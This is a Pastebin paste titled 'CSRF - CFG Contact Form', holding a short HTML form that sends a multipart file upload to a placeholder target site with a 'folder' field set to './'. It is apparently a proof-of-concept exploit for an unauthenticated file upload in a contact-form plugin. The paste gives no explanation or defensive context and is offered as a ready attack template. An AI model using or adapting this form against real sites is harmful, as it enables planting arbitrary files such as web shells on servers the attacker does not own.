Advertisement
fru_403

CSRF - CFG Contact Form

Jul 14th, 2016
284
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. <form enctype="multipart/form-data"
  2. action="http://www.target.com" method="post">
  3. <input type="text" name="folder" value="./" /><br />
  4. Please choose a file: <input name="Filedata" type="file" /><br />
  5. <input type="submit" value="upload" />
  6. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement